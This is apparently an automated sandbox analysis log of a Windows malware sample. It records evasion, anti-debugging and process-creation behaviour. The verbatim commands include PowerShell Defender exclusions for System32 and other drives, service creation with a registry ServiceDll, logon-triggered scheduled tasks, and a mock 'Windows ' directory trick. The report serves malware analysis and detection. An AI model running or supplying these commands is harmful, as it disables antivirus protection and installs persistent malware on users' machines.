Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820 | Thread sleep count: 2949 > 30
Source: C:\Windows\System32\svchost.exe TID: 3192 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3192 | Thread sleep time: -30000000s >= -30000s
Source: C:\Windows\System32\console_zero.exe TID: 5824 | Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136 | Thread sleep count: 6228 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 | Thread sleep count: 3363 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 1468 | Thread sleep count: 83 > 30
Source: C:\Windows\System32\console_zero.exe TID: 3200 | Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 | Thread sleep count: 6802 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976 | Thread sleep count: 2870 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084 | Thread sleep count: 6367 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800 | Thread sleep count: 3303 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_64946F50 GetSystemTimeAdjustment followed by cmp: cmp ecx, 03h and CTI: jle 64946F63h | 42_2_64946F50
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA20144 FindClose,FindFirstFileExW,GetLastError, | 45_2_00007FF71FA20144
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA33764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 45_2_00007FF71FA33764
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA201B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, | 45_2_00007FF71FA201B8
Source: C:\Windows\System32\crypti.exe | Code function: 76_2_00007FF60CCCD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 76_2_00007FF60CCCD568
Source: C:\Windows\System32\crypti.exe | Code function: 83_2_00007FF7D6EFD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 83_2_00007FF7D6EFD568
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 60000
Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 6000000
Source: C:\Windows\System32\console_zero.exe | Thread delayed: delay time: 50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\console_zero.exe | Thread delayed: delay time: 50000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000013.00000002.3451122928.000001F6D3654000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.3449238654.000001F6CDE2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000002A.00000002.3449493964.00000266EA42B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\pyld611114.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Windows\System32\console_zero.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_649461C0 IsDebuggerPresent,RaiseException, | 42_2_649461C0
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFDA377B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency, | 42_2_00007FFDA377B470
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA349D0 GetProcessHeap, | 45_2_00007FF71FA349D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows \System32\printui.exe | Code function: 27_2_00007FF63F421880 SetUnhandledExceptionFilter, | 27_2_00007FF63F421880
Source: C:\Windows \System32\printui.exe | Code function: 27_2_00007FF63F421B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 27_2_00007FF63F421B5C
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 42_2_64947650
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, | 42_2_6828C940
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFD94729508 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 42_2_00007FFD94729508
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFD9471B3B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 42_2_00007FFD9471B3B0
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFDA368EE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 42_2_00007FFDA368EE70
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFDA368FA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 42_2_00007FFDA368FA50
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFDA36F7178 SetUnhandledExceptionFilter, | 42_2_00007FFDA36F7178
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFDA36F6F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 42_2_00007FFDA36F6F94
Source: C:\Windows\System32\svchost.exe | Code function: 42_2_00007FFDA36F6630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 42_2_00007FFDA36F6630
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA21800 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 45_2_00007FF71FA21800
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA286CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 45_2_00007FF71FA286CC
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA21C94 SetUnhandledExceptionFilter, | 45_2_00007FF71FA21C94
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FF71FA21AB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 45_2_00007FF71FA21AB4
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FFDA3796224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 45_2_00007FFDA3796224
Source: C:\Windows\System32\console_zero.exe | Code function: 45_2_00007FFDA37957A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 45_2_00007FFDA37957A0
Source: C:\Windows\System32\crypti.exe | Code function: 76_2_00007FF60CCACE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 76_2_00007FF60CCACE30
Source: C:\Windows\System32\crypti.exe | Code function: 76_2_00007FF60CCBA8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 76_2_00007FF60CCBA8A8
Source: C:\Windows\System32\crypti.exe | Code function: 76_2_00007FF60CCAD1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 76_2_00007FF60CCAD1CC
Source: C:\Windows\System32\crypti.exe | Code function: 76_2_00007FF60CCAD3AC SetUnhandledExceptionFilter, | 76_2_00007FF60CCAD3AC
Source: C:\Windows\System32\crypti.exe | Code function: 83_2_00007FF7D6EEA8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 83_2_00007FF7D6EEA8A8
Source: C:\Windows\System32\crypti.exe | Code function: 83_2_00007FF7D6EDD3AC SetUnhandledExceptionFilter, | 83_2_00007FF7D6EDD3AC
Source: C:\Windows\System32\crypti.exe | Code function: 83_2_00007FF7D6EDD1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 83_2_00007FF7D6EDD1CC
Source: C:\Windows\System32\crypti.exe | Code function: 83_2_00007FF7D6EDCE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 83_2_00007FF7D6EDCE30

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x816796
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x816796\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x816796.dat" /f && sc start x816796
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x816796\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x816796.dat" /f && sc start x816796
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FF71FA39690 cpuid 45_2_00007FF71FA39690
Source: C:\Windows\System32\svchost.exe Code function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,42_2_682864E0
Source: C:\Windows\System32\svchost.exe Code function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,42_2_68287D70
Source: C:\Windows\System32\svchost.exe Code function: getenv,GetLocaleInfoA,42_2_68286680
Source: C:\Windows\System32\svchost.exe Code function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,42_2_00007FFDA36F4B70
Source: C:\Windows\System32\console_zero.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,45_2_00007FF71FA2F978
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesW,45_2_00007FF71FA370F8
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,45_2_00007FF71FA377F4
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoW,45_2_00007FF71FA376B0
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,GetLocaleInfoW,45_2_00007FF71FA2F610
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,45_2_00007FF71FA375FC
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesEx,45_2_00007FF71FA2F540
Source: C:\Windows\System32\console_zero.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,45_2_00007FF71FA36D94
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoW,45_2_00007FF71FA374A4
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoEx,FormatMessageA,45_2_00007FF71FA1FBA8
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesW,45_2_00007FF71FA2F29C
Source: C:\Windows\System32\console_zero.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,45_2_00007FF71FA37260
Source: C:\Windows\System32\console_zero.exe Code function: EnumSystemLocalesW,45_2_00007FF71FA371C8
Source: C:\Windows\System32\crypti.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,76_2_00007FF60CCC869C
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,76_2_00007FF60CCD0D74
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,76_2_00007FF60CCC7FC0
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,76_2_00007FF60CCD0FB8
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,76_2_00007FF60CCD1110
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,76_2_00007FF60CCD0C0C
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,76_2_00007FF60CCD0CDC
Source: C:\Windows\System32\crypti.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,76_2_00007FF60CCD08A8
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,76_2_00007FF60CCD11C4
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,76_2_00007FF60CCD1308
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoEx,GetLocaleInfoW,76_2_00007FF60CCC8334
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesEx,76_2_00007FF60CCC8264
Source: C:\Windows\System32\crypti.exe Code function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,83_2_00007FF7D6EF869C
Source: C:\Windows\System32\crypti.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,83_2_00007FF7D6F008A8
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoEx,GetLocaleInfoW,83_2_00007FF7D6EF8334
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,83_2_00007FF7D6F011C4
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,83_2_00007FF7D6F01308
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesEx,83_2_00007FF7D6EF8264
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,83_2_00007FF7D6EF7FC0
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,83_2_00007FF7D6F00FB8
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,83_2_00007FF7D6F01110
Source: C:\Windows\System32\crypti.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,83_2_00007FF7D6F00D74
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,83_2_00007FF7D6F00C0C
Source: C:\Windows\System32\crypti.exe Code function: EnumSystemLocalesW,83_2_00007FF7D6F00CDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
